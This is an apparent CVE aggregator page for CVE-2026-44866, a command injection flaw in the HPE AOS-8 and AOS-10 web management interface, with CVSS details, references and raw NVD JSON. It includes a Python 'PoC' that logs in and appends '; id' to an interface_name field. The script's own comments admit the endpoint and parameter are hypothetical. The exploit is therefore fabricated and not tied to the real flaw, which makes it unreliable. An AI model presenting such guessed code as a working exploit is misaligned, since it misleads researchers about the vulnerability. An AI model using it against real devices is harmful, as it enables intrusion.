CVE-2026-44866

Description

Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE AOS-8 (具体受影响版本请参考厂商公告)

HPE AOS-10 (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Exploit Title: HPE AOS Command Injection (CVE-2026-44866)
# Date: 2026-05-12
# Author: Security Researcher
# Vulnerable Product: HPE AOS-8, AOS-10
# CVE: CVE-2026-44866

import requests

def exploit(target_ip, username, password):
    # The endpoint might vary, this is a hypothetical example based on the description
    target_url = f"https://{target_ip}/admin/network_config"
    
    # Payload to execute a simple command (e.g., id)
    # Injecting via a hypothetical parameter 'interface'
    payload = "; id"
    
    session = requests.Session()
    
    # Step 1: Authenticate
    login_data = {
        "username": username,
        "password": password
    }
    
    try:
        login_resp = session.post(f"https://{target_ip}/login", data=login_data, verify=False)
        if login_resp.status_code != 200:
            print("Login failed")
            return
        
        print("Login successful.")
        
        # Step 2: Send Exploit Payload
        # Assuming the vulnerable parameter takes a network interface name or similar config
        exploit_data = {
            "interface_name": f"eth0{payload}",
            "action": "save"
        }
        
        response = session.post(target_url, data=exploit_data, verify=False)
        
        # Check if command output is reflected or if status indicates success
        if response.status_code == 200:
            print(f"Exploit sent. Response: {response.text[:200]}")
        else:
            print("Exploit request failed.")
            
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    exploit("192.168.1.1", "admin", "admin")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44866
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44866
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44866/
[4] VulDB https://vuldb.com/cve/CVE-2026-44866
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44866", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.243", "lastModified": "2026-05-12T20:16:45.243", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}